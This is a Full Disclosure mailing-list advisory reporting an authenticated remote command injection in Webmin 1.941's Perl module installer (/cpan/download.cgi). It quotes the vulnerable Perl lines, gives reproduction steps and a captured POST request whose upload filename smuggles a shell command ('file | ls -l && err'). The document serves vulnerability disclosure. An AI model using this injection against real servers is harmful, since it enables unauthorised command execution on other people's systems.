[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAJ-5kWYXfZUypUm1Xtj2HBuG_XkDSMhRtZ=95b1y_bv00pZffg@mail.gmail.com>
Date: Wed, 6 May 2020 08:47:23 +0200
From: raki ben hamouda <raki7bh@...il.com>
To: "submit@...sec.com" <submit@...sec.com>,
Packet Storm <packet@...ketstormsecurity.com>,
"fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Webmin (Upload Module) Remote Command Injection Vulnerability
Document Title:
===============
Webmin 1.941 (Install Module) Remote Command Injection Vulnerability
Common Vulnerability Scoring System:
====================================
8.5
Vulnerability Class:
====================
Command Injection
Current Estimated Price:
========================
2.000€ - 3.000€
Affected Product(s):
====================
Webmin
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A remote authenticated Command Injection vulnerability has been discovered
in the official Webmin product .
The security vulnerability allows a remote attacker with only permission to
"Install Module Perl Component"
to execute arbitrary Operating System Commands.
this is due to no check performed on the user input "upload" parameter when
it passed to open() perl function
causing execution of any command .
The vulnerability is located in the `/cpan/download.cgi` modules and the
`upload` parameter
of the module name to install.
The security risk of the arbitrary RCE vulnerability is estimated as High
with a cvss (common vulnerability scoring system) count of 8.5.
Exploitation of the RCE web vulnerability requires a low privilege
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.
===============================
##When digging in code :
I needed only to reach this line code to make it work :
&install_error(&text('download_etar', "<tt>$tar</tt>"));
However passing user input directly to open() is not a solution, this
includes also all these lines :
open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");
system("cd $mtemp ; gunzip -c $dirs{$d} | tar xf - >/dev/null");
system("$cmd >/dev/null 2>&1 </dev/null");
%needreqs = map { eval "use $_"; $@ ? ($_, 1) : ($_, 0) } @allreqs;
=============================
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /cpan/download.cgi
Vulnerable Parameter(s):
[+] upload
Server version
1.941
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low
privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
1-Attacker must have permission to the Install Perl Modules component
2-Go to "Others"->"Perl Modules"->"Install Modules"->Select 'From Uploaded
File'->Pick Any file
3-attacker intercepts the request that follows :
--- PoC Session Logs [POST] ---
POST /cpan/download.cgi HTTP/1.1
Host: 192.168.239.129:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: download.cgi
X-Requested-From: cpan
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------
7478318236766462923988573986
Content-Length: 682
Origin: https://192.168.239.129:10000
Connection: close
Referer: https://192.168.239.129:10000/cpan/?xnavigation=1
Cookie: redirect=1; testing=1; sid=110b33c42e470d0aafa5ab11fe9d09a7
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="cpan"
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="local"
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="source"
1
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="upload"; filename="file | ls -l &&
err"
Content-Type: [nothing here]
[Nothing Here]
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="url"
-----------------------------7478318236766462923988573986--
4-Modify the "upload" parameter with string : "file | ls -l && err"
##Successfully reproduced the Vulnerability.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists